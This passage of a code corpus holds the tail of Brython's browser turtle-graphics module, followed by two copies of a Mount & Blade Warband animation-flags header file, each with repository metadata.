self._angleOrient = 1
else: # mode == "logo":
self._angleOffset = -self._fullcircle/4.
self._angleOrient = 1
def _setDegreesPerAU(self, fullcircle):
"""Helper function for degrees() and radians()"""
self._fullcircle = fullcircle
self._degreesPerAU = 360/fullcircle
def degrees(self, fullcircle=360.0):
""" Set angle measurement units to degrees, or possibly other system.
"""
self._setDegreesPerAU(fullcircle)
def radians(self):
""" Set the angle measurement units to radians.
"""
self._setDegreesPerAU(2*math.pi)
def _rotate(self, angle):
"""Turn turtle counterclockwise by specified angle if angle > 0."""
pass
def _goto(self, x, y):
pass # implemented by derived class
def forward(self, distance):
"""Move the turtle forward by the specified distance.
"""
x1 = distance * cos(self._angle * self.degree_to_radians)
y1 = distance * sin(self._angle * self.degree_to_radians)
self._distance = distance
self._goto(self._x + x1, self._y + y1)
fd = forward
def back(self, distance):
"""Move the turtle backward by distance.
"""
x1 = -distance * cos(self._angle * self.degree_to_radians)
y1 = -distance * sin(self._angle * self.degree_to_radians)
self._distance = distance
self._goto(self._x + x1, self._y + y1)
backward = back
bk = back
def right(self, angle):
"""Turn turtle right by angle units.
"""
angle*=self._degreesPerAU
self._angle += self.screen.y_points_down*angle
self._rotate_image(-angle)
rt = right
def left(self, angle):
"""Turn turtle left by angle units.
"""
angle*=self._degreesPerAU
self._angle += -self.screen.y_points_down*angle
self._rotate_image(angle)
lt = left
def pos(self):
"""Return the turtle's current location (x,y), as a formatted tuple
"""
return FormattedTuple(self._x, self._y)
position = pos
def xcor(self):
""" Return the turtle's x coordinate.
"""
return self._x
def ycor(self):
""" Return the turtle's y coordinate
"""
return self._y
def goto(self, x, y=None):
"""Move turtle to an absolute position.
"""
if y is None:
x, y = *x
# distance only needed to calculate the duration of
# the animation which is based on "distance" and "speed" as well.
# We use the Manhattan distance here as it is *much* faster on Chrome,
# than using the proper distance with calls to math.sqrt, while
# giving acceptable results
#
# forward, backward, etc., call _goto directly with the distance
# given by the user
self._distance = abs(self._x - x) + abs(self._y - y)
self._goto(x, y)
setpos = goto
setposition = goto
def home(self):
"""Move turtle to the origin - coordinates (0,0), facing in the
default orientation
"""
self.goto(0, 0)
self.setheading(0)
def setx(self, x):
"""Set the turtle's first coordinate to x
"""
self._distance = abs(x - self._x)
self._goto(x, self._y)
def sety(self, y):
"""Set the turtle's second coordinate to y
"""
self._distance = abs(y - self._y)
self._goto(self._x, y)
def distance(self, x, y=None):
"""Return the distance from the turtle to (x,y) in turtle step units.
"""
if y is None:
assert isinstance(x, tuple)
x, y = x
return math.sqrt((self._x - x)**2 + (self._y - y)**2)
def towards(self, x, y=None):
"""Return the angle of the line from the turtle's position to (x, y).
"""
if y is None:
assert isinstance(x, tuple)
x, y = x
x, y = x - self._x, y - self._y
result = round(math.atan2(y, x)*180.0/math.pi, 10) % 360.0
result /= self._degreesPerAU
return (self._angleOffset + self._angleOrient*result) % self._fullcircle
def heading(self):
""" Return the turtle's current heading.
"""
angle = self._angle / self._degreesPerAU
return (self._angleOffset + self._angleOrient*angle) % self._fullcircle
def setheading(self, to_angle):
"""Set the orientation of the turtle to to_angle.
"""
self._rotate(to_angle - self._angle)
seth = setheading
def circle(self, radius, extent=None, steps=None):
""" Draw an approximate (arc) circle with given radius, using straight
line segments.
Arguments:
radius -- a number
extent (optional) -- a number
steps (optional) -- an integer
Draw a circle with given radius. The center is radius units left
of the turtle; extent - an angle - determines which part of the
circle is drawn. If extent is not given, draw the entire circle.
If extent is not a full circle, one endpoint of the arc is the
current pen position. Draw the arc in counterclockwise direction
if radius is positive, otherwise in clockwise direction. Finally
the direction of the turtle is changed by the amount of extent.
As the circle is approximated by an inscribed regular polygon,
steps determines the number of steps to use. If not given,
it will be calculated automatically. Maybe used to draw regular
polygons.
"""
speed = self.speed()
if extent is None:
extent = self._fullcircle
if steps is None:
frac = abs(extent)/self._fullcircle
steps = 1+int(min(11+abs(radius)/6.0, 59.0)*frac)
w = 1.0 * extent / steps
w2 = 0.5 * w
l = 2.0 * radius * math.sin(w2*math.pi/180.0*self._degreesPerAU)
if radius < 0:
l, w, w2 = -l, -w, -w2
self._rotate(w2)
for i in range(steps):
self.speed(speed)
self.forward(l)
self.speed(0)
self._rotate(w)
self._rotate(-w2)
self.speed(speed)
class TPen:
"""Drawing part of the Turtle.
"""
def __init__(self):
TPen._reset(self)
def _reset(self, pencolor=_CFG["pencolor"],
fillcolor=_CFG["fillcolor"]):
self._pensize = 1
self._shown = True
self._drawing = True
self._pencolor = 'black'
self._fillcolor = 'black'
self._speed = 3
self._stretchfactor = (1., 1.)
def resizemode(self, rmode=None):
sys.stderr.write("Warning: TPen.resizemode() is not implemented.\n")
def pensize(self, width=None):
"""Set or return the line thickness.
"""
if width is None:
return self._pensize
self.pen(pensize=width)
width = pensize
def pendown(self):
"""Pull the pen down -- drawing when moving.
"""
if self._drawing:
return
self.pen(pendown=True)
pd = pendown
down = pendown
def penup(self):
"""Pull the pen up -- no drawing when moving.
"""
if not self._drawing:
return
self.pen(pendown=False)
pu = penup
up = penup
def isdown(self):
"""Return True if pen is down, False if it's up.
"""
return self._drawing
def speed(self, speed=None):
""" Return or set the turtle's speed.
Optional argument:
speed -- an integer in the range 0..10 or a speedstring (see below)
Set the turtle's speed to an integer value in the range 0 .. 10.
If no argument is given: return current speed.
If input is a number greater than 10 or smaller than 0.5,
speed is set to 0.
Speedstrings are mapped to speedvalues in the following way:
'fastest' : 0
'fast' : 10
'normal' : 6
'slow' : 3
'slowest' : 1
speeds from 1 to 10 enforce increasingly faster animation of
line drawing and turtle turning.
Attention:
speed = 0 : *no* animation takes place. forward/back makes turtle jump
and likewise left/right make the turtle turn instantly.
"""
speeds = {'fastest': 0, 'fast': 10, 'normal': 6, 'slow': 3, 'slowest': 1}
if speed is None:
return self._speed
if speed in speeds:
speed = speeds[speed]
elif 0.5 < speed < 10.5:
speed = int(round(speed))
else:
speed = 0
self.pen(speed=speed)
def color(self, *args):
"""Return or set the pencolor and fillcolor.
IMPORTANT: this is very different than the CPython's version.
Colors are using strings in any format recognized by a browser
(named color, rgb, rgba, hex, hsl, etc.)
Acceptable arguments:
no argument: returns (pencolor, fillcolor)
single string -> sets both pencolor and fillcolor to that value
two string arguments -> taken to be pencolor, fillcolor
tuple of two strings -> taken to be (pencolor, fillcolor)
"""
if args:
l = len(args)
if l == 1:
if isinstance(args[0], tuple):
pencolor = args[0][0]
fillcolor = args[0][1]
else:
pencolor = fillcolor = args[0]
elif l == 2:
pencolor, fillcolor = args
if not isinstance(pencolor, str) or not isinstance(fillcolor, str):
raise TurtleGraphicsError("bad color arguments: %s" % str(args))
self.pen(pencolor=pencolor, fillcolor=fillcolor)
else:
return self._pencolor, self._fillcolor
def pencolor(self, color=None):
""" Return or set the pencolor.
IMPORTANT: this is very different than the CPython's version.
Colors are using strings in any format recognized by a browser
(named color, rgb, rgba, hex, hsl, etc.)
"""
if color is not None:
if not isinstance(color, str):
raise TurtleGraphicsError("bad color arguments: %s" % str(color))
if color == self._pencolor:
return
self.pen(pencolor=color)
else:
return self._pencolor
def fillcolor(self, color=None):
""" Return or set the fillcolor.
IMPORTANT: this is very different than the CPython's version.
Colors are using strings in any format recognized by a browser
(named color, rgb, rgba, hex, hsl, etc.)
"""
if color is not None:
if not isinstance(color, str):
raise TurtleGraphicsError("bad color arguments: %s" % str(color))
if color == self._fillcolor:
return
self.pen(fillcolor=color)
else:
return self._pencolor
def showturtle(self):
"""Makes the turtle visible.
"""
if self._shown:
return
self.pen(shown=True)
self.left(0) # this will update the display to the correct rotation
st = showturtle
def hideturtle(self):
"""Makes the turtle invisible.
"""
if self._shown:
self.pen(shown=False)
ht = hideturtle
def isvisible(self):
"""Return True if the Turtle is shown, False if it's hidden.
"""
return self._shown
def pen(self, pen=None, **pendict):
"""Return or set the pen's attributes.
Arguments:
pen -- a dictionary with some or all of the below listed keys.
**pendict -- one or more keyword-arguments with the below
listed keys as keywords.
Return or set the pen's attributes in a 'pen-dictionary'
with the following key/value pairs:
"shown" : True/False
"pendown" : True/False
"pencolor" : color-string or color-tuple
"fillcolor" : color-string or color-tuple
"pensize" : positive number
"speed" : number in range 0..10
"""
_pd = {"shown": self._shown,
"pendown": self._drawing,
"pencolor": self._pencolor,
"fillcolor": self._fillcolor,
"pensize": self._pensize,
"speed": self._speed
}
if not (pen or pendict):
return _pd
if isinstance(pen, dict):
p = pen
else:
p = {}
p.update(pendict)
_p_buf = {}
for key in p:
_p_buf[key] = _pd[key]
if "pendown" in p:
self._drawing = p["pendown"]
if "pencolor" in p:
old_color = self._pencolor
self._pencolor = p["pencolor"]
previous_end, new_frame_id = self.screen._new_frame()
anim = svg.animate(Id=new_frame_id, begin=previous_end,
dur=_CFG["min_duration"], fill="freeze",
attributeName="stroke", attributeType="XML",
From=old_color, to=self._pencolor)
self.svg <= anim
if "pensize" in p:
self._pensize = p["pensize"]
if "fillcolor" in p:
old_color = self._fillcolor
self._fillcolor = p["fillcolor"]
previous_end, new_frame_id = self.screen._new_frame()
anim = svg.animate(Id=new_frame_id, begin=previous_end,
dur=_CFG["min_duration"], fill="freeze",
attributeName="fill", attributeType="XML",
From=old_color, to=self._fillcolor)
self.svg <= anim
if "speed" in p:
self._speed = p["speed"]
if "shown" in p:
old_shown = self._shown
if old_shown:
opacity = 0
old_opacity = 1
else:
opacity = 1
old_opacity = 0
previous_end, new_frame_id = self.screen._new_frame()
anim = svg.animate(Id=new_frame_id, begin=previous_end,
dur=_CFG["min_duration"], fill="freeze",
attributeName="opacity", attributeType="XML",
From=old_opacity, to=opacity)
self.svg <= anim
self.forward(0) # updates the turtle visibility on screen
self._shown = p["shown"]
# No RawTurtle/RawPen for this version, unlike CPython's; only Turtle/Pen
class Turtle(TPen, TNavigator):
"""Animation part of the Turtle.
Puts Turtle upon a TurtleScreen and provides tools for
its animation.
"""
_pen = None
screen = None
def __init__(self, shape=_CFG["shape"], visible=_CFG["visible"]):
self.screen = Screen()
TPen.__init__(self)
TNavigator.__init__(self, self.screen.mode())
self._poly = None
self._creatingPoly = False
self._fillitem = self._fillpath = None
self.name = shape
self.svg, rotation = self.screen.create_svg_turtle(self, name=shape)
self.svg.setAttribute("opacity", 0)
self._shown = False
if visible:
self.showturtle() # will ensure that turtle become visible at appropriate time
self.screen._turtles.append(self)
self.rotation_correction = rotation
# apply correction to image orientation
self._old_heading = self.heading() + self.rotation_correction
speed = self.speed()
self.speed(0)
self.left(-self._angleOffset) # this will update the display to include the correction
self.speed(speed)
def reset(self):
"""Delete the turtle's drawings and restore its default values.
"""
## TODO: review this and most likely revise docstring.
TNavigator.reset(self)
TPen._reset(self)
self._old_heading = self.heading() + self.rotation_correction
self.home()
self.color(_CFG["pencolor"], _CFG["fillcolor"])
def clear(self):
sys.stderr.write("Warning: Turtle.clear() is not implemented.\n")
def shape(self, name=None):
"""Set turtle shape to shape with given name
/ return current shapename if no name is provided
"""
if name is None:
return self.name
_turtle = self._make_copy(name=name)
visible = self.isvisible()
if visible:
self.hideturtle()
self.screen.turtle_canvas <= self.svg
self.svg = _turtle
self.screen._turtles.append(self)
if visible:
self.showturtle()
def clearstamp(self, *args, **kwargs):
sys.stderr.write("Warning: Turtle.clearstamp() is not implemented.\n")
def clearstamps(self, *args, **kwargs):
sys.stderr.write("Warning: Turtle.clearstamps() is not implemented.\n")
def onclick(self, *args, **kwargs):
sys.stderr.write("Warning: Turtle.onclick() is not implemented.\n")
def ondrag(self, *args, **kwargs):
sys.stderr.write("Warning: Turtle.ondrag() is not implemented.\n")
def onrelease(self, *args, **kwargs):
sys.stderr.write("Warning: Turtle.onrelease() is not implemented.\n")
def undo(self, *args, **kwargs):
sys.stderr.write("Warning: Turtle.undo() is not implemented.\n")
def setundobuffer(self, *args, **kwargs):
sys.stderr.write("Warning: Turtle.setundobuffer() is not implemented.\n")
def undobufferentries(self, *args, **kwargs):
sys.stderr.write("Warning: Turtle.undobufferentries() is not implemented.\n")
def shapesize(self, *args, **kwargs):
sys.stderr.write("Warning: Turtle.shapesize() is not implemented.\n")
turtlesize = shapesize
def shearfactor(self, shear=None):
sys.stderr.write("Warning: Turtle.shearfactor() is not implemented.\n")
def settiltangle(self, angle):
sys.stderr.write("Warning: Turtle.settiltangle() is not implemented.\n")
def tiltangle(self, angle=None):
sys.stderr.write("Warning: Turtle.tiltangle() is not implemented.\n")
def tilt(self, angle):
sys.stderr.write("Warning: Turtle.tilt() is not implemented.\n")
def shapetransform(self, t11=None, t12=None, t21=None, t22=None):
sys.stderr.write("Warning: Turtle.shapetransform() is not implemented.\n")
def get_shapepoly(self):
sys.stderr.write("Warning: Turtle.get_shapepoly() is not implemented.\n")
def _goto(self, x, y):
"""Move the pen to the point end, thereby drawing a line
if pen is down. All other methods for turtle movement depend
on this one.
"""
begin, duration, _from, _to = self.screen._drawline(self,
((self._x, self._y), (x, y)),
(self._pencolor, self._fillcolor),
self._pensize, self._speed)
if self._shown:
self.svg <= svg.animateMotion(begin=begin, dur=_CFG["min_duration"],
fill="remove")
self.svg <= svg.animateMotion(From="%s,%s" % _from, to="%s,%s" % _to,
dur=duration, begin=begin, fill="freeze")
if self._fillpath is not None:
self._fillpath.append((x, y))
self._position = (x, y)
self._x = x
self._y = y
def _rotate(self, angle):
"""Turns pen clockwise by angle.
"""
angle*=self._degreesPerAU
self._angle += -self.screen.y_points_down*angle
self._rotate_image(angle)
def _rotate_image(self, angle):
new_heading = self._old_heading - angle
if self.isvisible():
previous_end, new_frame_id = self.screen._new_frame()
if self._speed == 0:
duration = _CFG["min_duration"]
else:
duration = (abs(angle)/(self._speed * 360))
if duration < 0.001:
duration = _CFG["min_duration"]
else:
duration = "%6.3fs" % duration
self.svg <= svg.animateMotion(begin=previous_end,
dur=_CFG["min_duration"], fill="remove")
self.svg <= svg.animateTransform(attributeName="transform",
Id = new_frame_id,
type="rotate",
From=(self._old_heading, 0, 0),
to=(new_heading, 0, 0),
begin=previous_end,
dur=duration, fill="freeze")
self._old_heading = new_heading
def filling(self):
"""Return fillstate (True if filling, False else).
"""
return self._fillpath is not None
def begin_fill(self):
"""Called just before drawing a shape to be filled.
"""
self._fillpath = [(self._x, self._y)]
def end_fill(self):
"""Fill the shape drawn after the call begin_fill().
"""
if self.filling() and len(self._fillpath) > 2:
self.screen._drawpoly(self._fillpath, outline=self._pencolor,
fill=self._fillcolor, )
else:
print("No path to fill.")
self._fillpath = None
def dot(self, size=None, color=None):
"""Draw a filled circle with diameter size, using color.
"""
item = self.screen._dot((self._x, self._y), size, color=color)
def _write(self, txt, align, font, color=None):
"""Performs the writing for write()
"""
if color is None:
color = self._pencolor
self.screen._write((self._x, self._y), txt, align, font, color)
def write(self, arg, align="left", font=("Arial", 8, "normal"), color=None):
"""Write text at the current turtle position.
Arguments:
arg -- info, which is to be written to the TurtleScreen; it will be
converted to a string.
align (optional) -- one of the strings "left", "center" or right"
font (optional) -- a triple (fontname, fontsize, fonttype)
"""
self._write(str(arg), align.lower(), font, color=color)
def begin_poly(self):
"""Start recording the vertices of a polygon.
"""
self._poly = [(self._x, self._y)]
self._creatingPoly = True
def end_poly(self):
"""Stop recording the vertices of a polygon.
"""
self._creatingPoly = False
def get_poly(self):
"""Return the lastly recorded polygon.
"""
# check if there is any poly?
if self._poly is not None:
return tuple(self._poly)
def getscreen(self):
"""Return the TurtleScreen object, the turtle is drawing on.
"""
return self.screen
def getturtle(self):
"""Return the Turtle object itself.
Only reasonable use: as a function to return the 'anonymous turtle'
"""
return self
getpen = getturtle
def _make_copy(self, name=None):
'''makes a copy of the current svg turtle, but possibly using a
different shape. This copy is then ready to be inserted
into a canvas.'''
if name is None:
name = self.name
# We recreate a copy of the existing turtle, possibly using a different
# name/shape; we set the opacity to
# 0 since there is no specific time associated with the creation of
# such an object: we do not want to show it early.
_turtle, rotation = self.screen.create_svg_turtle(self, name=name)
_turtle.setAttribute("opacity", 0)
_turtle.setAttribute("fill", self._fillcolor)
_turtle.setAttribute("stroke", self._pencolor)
# We use timed animations to get it with the proper location, orientation
# and appear at the desired time.
previous_end, new_frame_id = self.screen._new_frame()
x, y = self.screen._convert_coordinates(self._x, self._y)
_turtle <= svg.animateMotion(begin=previous_end, dur=_CFG["min_duration"],
fill="remove")
_turtle <= svg.animateMotion(Id=new_frame_id,
From="%s,%s" % (x, y), to="%s,%s" % (x, y),
dur=_CFG["min_duration"], begin=previous_end,
fill="freeze")
_turtle <= svg.animateTransform(attributeName="transform",
type="rotate",
From=(self._old_heading, 0, 0),
to=(self._old_heading, 0, 0),
begin=previous_end,
dur=_CFG["min_duration"], fill="freeze")
_turtle <= svg.animate(begin=previous_end,
dur=_CFG["min_duration"], fill="freeze",
attributeName="opacity", attributeType="XML",
From=0, to=1)
return _turtle
def stamp(self):
'''draws a permanent copy of the turtle at its current location'''
_turtle = self._make_copy(name=self.name)
self.screen.canvas <= _turtle
def clone(self):
"""Create and return a clone of the turtle.
"""
n = Turtle(self.name)
attrs = vars(self)
new_dict = {}
for attr in attrs:
if isinstance(getattr(self, attr), (int, str, float)):
new_dict[attr] = getattr(self, attr)
n.__dict__.update(**new_dict)
# ensure that visible characteristics are consistent with settings
if not n._shown:
n._shown = True # otherwise, hideturtle() would have not effect
n.hideturtle()
n.left(0)
n.fd(0)
n.color(n.color())
return n
Pen = Turtle
def done():
Screen().show_scene()
show_scene = done
def replay_scene():
"Start playing an animation by 'refreshing' the canvas."
if (_CFG["turtle_canvas_id"] in document and
document[_CFG["turtle_canvas_id"]] is not None):
element = document[_CFG["turtle_canvas_id"]]
element.parentNode.removeChild(element)
show_scene()
def restart():
"For Brython turtle: clears the existing drawing and canvas"
_CFG.update(_cfg_copy)
Screen().reset()
Turtle._pen = None
if (_CFG["turtle_canvas_id"] in document and
document[_CFG["turtle_canvas_id"]] is not None):
element = document[_CFG["turtle_canvas_id"]]
element.parentNode.removeChild(element)
### Creating functions based
import inspect
def getmethparlist(ob):
"""Get strings describing the arguments for the given object
Returns a pair of strings representing function parameter lists
including parenthesis. The first string is suitable for use in
function definition and the second is suitable for use in function
call. The "self" parameter is not included.
"""
defText = callText = ""
# bit of a hack for methods - turn it into a function
# but we drop the "self" param.
# Try and build one for Python defined functions
args, varargs, varkw = inspect.getargs(ob.__code__)
items2 = args[1:]
realArgs = args[1:]
defaults = ob.__defaults__ or []
defaults = ["=%r" % (value,) for value in defaults]
defaults = [""] * (len(realArgs)-len(defaults)) + defaults
items1 = [arg + dflt for arg, dflt in zip(realArgs, defaults)]
if varargs is not None:
items1.append("*" + varargs)
items2.append("*" + varargs)
if varkw is not None:
items1.append("**" + varkw)
items2.append("**" + varkw)
defText = ", ".join(items1)
defText = "(%s)" % defText
callText = ", ".join(items2)
callText = "(%s)" % callText
return defText, callText
_tg_screen_functions = ['addshape', 'bgcolor', 'bgpic', 'bye',
'clearscreen', 'colormode', 'delay', 'exitonclick', 'getcanvas',
'getshapes', 'listen', 'mainloop', 'mode', 'numinput',
'onkey', 'onkeypress', 'onkeyrelease', 'onscreenclick', 'ontimer',
'register_shape', 'resetscreen', 'screensize', 'setup',
'setworldcoordinates', 'textinput', 'title', 'tracer', 'turtles', 'update',
'window_height', 'window_width']
_tg_turtle_functions = ['back', 'backward', 'begin_fill', 'begin_poly', 'bk',
'circle', 'clear', 'clearstamp', 'clearstamps', 'clone', 'color',
'degrees', 'distance', 'dot', 'down', 'end_fill', 'end_poly', 'fd',
'fillcolor', 'filling', 'forward', 'get_poly', 'getpen', 'getscreen', 'get_shapepoly',
'getturtle', 'goto', 'heading', 'hideturtle', 'home', 'ht', 'isdown',
'isvisible', 'left', 'lt', 'onclick', 'ondrag', 'onrelease', 'pd',
'pen', 'pencolor', 'pendown', 'pensize', 'penup', 'pos', 'position',
'pu', 'radians', 'right', 'reset', 'resizemode', 'rt',
'seth', 'setheading', 'setpos', 'setposition', 'settiltangle',
'setundobuffer', 'setx', 'sety', 'shape', 'shapesize', 'shapetransform', 'shearfactor', 'showturtle',
'speed', 'st', 'stamp', 'tilt', 'tiltangle', 'towards',
'turtlesize', 'undo', 'undobufferentries', 'up', 'width',
'write', 'xcor', 'ycor']
__all__ = (_tg_screen_functions + _tg_turtle_functions +
['done', 'restart', 'replay_scene', 'Turtle', 'Screen'])
## The following mechanism makes all methods of RawTurtle and Turtle available
## as functions. So we can enhance, change, add, delete methods to these
## classes and do not need to change anything here.
__func_body = """\
def {name}{paramslist}:
if {obj} is None:
{obj} = {init}
return {obj}.{name}{argslist}
"""
def _make_global_funcs(functions, cls, obj, init):
for methodname in functions:
try:
method = getattr(cls, methodname)
except AttributeError:
print("methodname missing:", methodname)
continue
pl1, pl2 = getmethparlist(method)
defstr = __func_body.format(obj=obj, init=init, name=methodname,
paramslist=pl1, argslist=pl2)
exec(defstr, globals())
_make_global_funcs(_tg_turtle_functions, Turtle, 'Turtle._pen', 'Turtle()')
_make_global_funcs(_tg_screen_functions, Screen, 'Turtle.screen', 'Screen()')
| {
"repo_name": "jonathanverner/brython",
"path": "www/src/Lib/turtle.py",
"copies": "2",
"size": "53120",
"license": "bsd-3-clause",
"hash": 144373378408001470,
"line_mean": 35.4584763212,
"line_max": 109,
"alpha_frac": 0.5578878012,
"autogenerated": false,
"ratio": 3.971291866028708,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5529179667228709,
"avg_score": null,
"num_lines": null
} |
arf_blend_in_0 = 0x00000001
arf_blend_in_1 = 0x00000002
arf_blend_in_2 = 0x00000003
arf_blend_in_3 = 0x00000004
arf_blend_in_4 = 0x00000005
arf_blend_in_5 = 0x00000006
arf_blend_in_6 = 0x00000007
arf_blend_in_7 = 0x00000008
arf_blend_in_8 = 0x00000009
arf_blend_in_9 = 0x0000000a
arf_blend_in_10 = 0x0000000b
arf_blend_in_11 = 0x0000000c
arf_blend_in_12 = 0x0000000d
arf_blend_in_13 = 0x0000000e
arf_blend_in_14 = 0x0000000f
arf_blend_in_15 = 0x00000010
arf_blend_in_16 = 0x00000011
arf_blend_in_17 = 0x00000012
arf_blend_in_18 = 0x00000013
arf_blend_in_19 = 0x00000014
arf_blend_in_20 = 0x00000015
arf_blend_in_21 = 0x00000016
arf_blend_in_22 = 0x00000017
arf_blend_in_23 = 0x00000018
arf_blend_in_24 = 0x00000019
arf_blend_in_25 = 0x0000001a
arf_blend_in_26 = 0x0000001b
arf_blend_in_27 = 0x0000001c
arf_blend_in_28 = 0x0000001d
arf_blend_in_29 = 0x0000001e
arf_blend_in_30 = 0x0000001f
arf_blend_in_31 = 0x00000020
arf_blend_in_32 = 0x00000021
arf_blend_in_48 = 0x00000031
arf_blend_in_64 = 0x00000041
arf_blend_in_128 = 0x00000081
arf_blend_in_254 = 0x000000ff
arf_make_walk_sound = 0x00000100
arf_make_custom_sound = 0x00000200
arf_two_handed_blade = 0x01000000
arf_lancer = 0x02000000
arf_stick_item_to_left_hand = 0x04000000
arf_cyclic = 0x10000000
arf_use_walk_progress = 0x20000000
arf_use_stand_progress = 0x40000000
arf_use_inv_walk_progress = 0x80000000
#-----------------------------------------
amf_priority_mask = 0x00000fff
amf_rider_rot_bow = 0x00001000
amf_rider_rot_throw = 0x00002000
amf_rider_rot_crossbow = 0x00003000
amf_rider_rot_pistol = 0x00004000
amf_rider_rot_overswing = 0x00005000
amf_rider_rot_thrust = 0x00006000
amf_rider_rot_swing_right = 0x00007000
amf_rider_rot_swing_left = 0x00008000
amf_rider_rot_couched_lance = 0x00009000
amf_rider_rot_shield = 0x0000a000
amf_rider_rot_defend = 0x0000b000
amf_start_instantly = 0x00010000
amf_use_cycle_period = 0x00100000
amf_use_weapon_speed = 0x00200000
amf_use_defend_speed = 0x00400000
amf_accurate_body = 0x00800000
amf_client_prediction = 0x01000000
amf_play = 0x02000000
amf_keep = 0x04000000
amf_restart = 0x08000000 # restart animation even if it is the current animation
amf_hide_weapon = 0x10000000
amf_client_owner_prediction = 0x20000000
amf_use_inertia = 0x40000000
amf_continue_to_next = 0x80000000
#-----------------------------------------
acf_synch_with_horse = 0x00000001
acf_align_with_ground = 0x00000002
acf_enforce_lowerbody = 0x00000100
acf_enforce_rightside = 0x00000200
acf_enforce_all = 0x00000400
acf_parallels_for_look_slope = 0x00001000
acf_lock_camera = 0x00002000
acf_displace_position = 0x00004000
acf_ignore_slope = 0x00008000
acf_thrust = 0x00010000
acf_right_cut = 0x00020000
acf_left_cut = 0x00040000
acf_overswing = 0x00080000
acf_rot_vertical_mask = 0x00300000
acf_rot_vertical_bow = 0x00100000
acf_rot_vertical_sword = 0x00200000
acf_anim_length_mask = 0xff000000
acf_anim_length_bits = 24
def acf_anim_length(x):
return (x << acf_anim_length_bits) & acf_anim_length_mask
#------------------------------------------
# Do not edit these lines
def get_byte(f):
if f == 0.0:
return 0
i = int(f * 255.0)
if (i< 1):
i=1
elif (i > 255):
i = 255
return i
def pack2f(a,b):
ai = get_byte(a)
bi = get_byte(b)
return ((bi << 8) | ai)
def pack4f(a,b,c,d):
ai = get_byte(a)
bi = get_byte(b)
ci = get_byte(c)
di = get_byte(d)
return ((di << 24) | (ci << 16) | (bi << 8) | ai)
| {
"repo_name": "Sw4T/Warband-Development",
"path": "mb_warband_module_system_1166/Module_system 1.166/headers/header_animations.py",
"copies": "2",
"size": "4400",
"license": "mit",
"hash": -7104227487844999000,
"line_mean": 32.8461538462,
"line_max": 97,
"alpha_frac": 0.5579545455,
"autogenerated": false,
"ratio": 2.8223220012828736,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.924507499424922,
"avg_score": 0.027040310506730687,
"num_lines": 130
} |
arf_blend_in_0 = 0x00000001
arf_blend_in_1 = 0x00000002
arf_blend_in_2 = 0x00000003
arf_blend_in_3 = 0x00000004
arf_blend_in_4 = 0x00000005
arf_blend_in_5 = 0x00000006
arf_blend_in_6 = 0x00000007
arf_blend_in_7 = 0x00000008
arf_blend_in_8 = 0x00000009
arf_blend_in_9 = 0x0000000a
arf_blend_in_10 = 0x0000000b
arf_blend_in_11 = 0x0000000c
arf_blend_in_12 = 0x0000000d
arf_blend_in_13 = 0x0000000e
arf_blend_in_14 = 0x0000000f
arf_blend_in_15 = 0x00000010
arf_blend_in_16 = 0x00000011
arf_blend_in_17 = 0x00000012
arf_blend_in_18 = 0x00000013
arf_blend_in_19 = 0x00000014
arf_blend_in_20 = 0x00000015
arf_blend_in_21 = 0x00000016
arf_blend_in_22 = 0x00000017
arf_blend_in_23 = 0x00000018
arf_blend_in_24 = 0x00000019
arf_blend_in_25 = 0x0000001a
arf_blend_in_26 = 0x0000001b
arf_blend_in_27 = 0x0000001c
arf_blend_in_28 = 0x0000001d
arf_blend_in_29 = 0x0000001e
arf_blend_in_30 = 0x0000001f
arf_blend_in_31 = 0x00000020
arf_blend_in_32 = 0x00000021
arf_blend_in_48 = 0x00000031
arf_blend_in_64 = 0x00000041
arf_blend_in_128 = 0x00000081
arf_blend_in_254 = 0x000000ff
arf_make_walk_sound = 0x00000100
arf_make_custom_sound = 0x00000200
arf_two_handed_blade = 0x01000000
arf_lancer = 0x02000000
arf_stick_item_to_left_hand = 0x04000000
arf_cyclic = 0x10000000
arf_use_walk_progress = 0x20000000
arf_use_stand_progress = 0x40000000
arf_use_inv_walk_progress = 0x80000000
#-----------------------------------------
amf_priority_mask = 0x00000fff
amf_rider_rot_bow = 0x00001000
amf_rider_rot_throw = 0x00002000
amf_rider_rot_crossbow = 0x00003000
amf_rider_rot_pistol = 0x00004000
amf_rider_rot_overswing = 0x00005000
amf_rider_rot_thrust = 0x00006000
amf_rider_rot_swing_right = 0x00007000
amf_rider_rot_swing_left = 0x00008000
amf_rider_rot_couched_lance = 0x00009000
amf_rider_rot_shield = 0x0000a000
amf_rider_rot_defend = 0x0000b000
amf_start_instantly = 0x00010000
amf_use_cycle_period = 0x00100000
amf_use_weapon_speed = 0x00200000
amf_use_defend_speed = 0x00400000
amf_accurate_body = 0x00800000
amf_client_prediction = 0x01000000
amf_play = 0x02000000
amf_keep = 0x04000000
amf_restart = 0x08000000 # restart animation even if it is the current animation
amf_hide_weapon = 0x10000000
amf_client_owner_prediction = 0x20000000
amf_use_inertia = 0x40000000
amf_continue_to_next = 0x80000000
#-----------------------------------------
acf_synch_with_horse = 0x00000001
acf_align_with_ground = 0x00000002
acf_enforce_lowerbody = 0x00000100
acf_enforce_rightside = 0x00000200
acf_enforce_all = 0x00000400
acf_parallels_for_look_slope = 0x00001000
acf_lock_camera = 0x00002000
acf_displace_position = 0x00004000
acf_ignore_slope = 0x00008000
acf_thrust = 0x00010000
acf_right_cut = 0x00020000
acf_left_cut = 0x00040000
acf_overswing = 0x00080000
acf_rot_vertical_mask = 0x00300000
acf_rot_vertical_bow = 0x00100000
acf_rot_vertical_sword = 0x00200000
acf_anim_length_mask = 0xff000000
acf_anim_length_bits = 24
def acf_anim_length(x):
return (x << acf_anim_length_bits) & acf_anim_length_mask
#------------------------------------------
# Do not edit these lines
def get_byte(f):
if f == 0.0:
return 0
i = int(f * 255.0)
if (i< 1):
i=1
elif (i > 255):
i = 255
return i
def pack2f(a,b):
ai = get_byte(a)
bi = get_byte(b)
return ((bi << 8) | ai)
def pack4f(a,b,c,d):
ai = get_byte(a)
bi = get_byte(b)
ci = get_byte(c)
di = get_byte(d)
return ((di << 24) | (ci << 16) | (bi << 8) | ai)
| {
"repo_name": "Eleyvie/wreck",
"path": "integrated/headers/header_animations.py",
"copies": "1",
"size": "4530",
"license": "mit",
"hash": -4842254718544660000,
"line_mean": 32.8461538462,
"line_max": 97,
"alpha_frac": 0.5419426049,
"autogenerated": false,
"ratio": 2.7638804148871263,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3805823019787127,
"avg_score": null,
"num_lines": null
} |
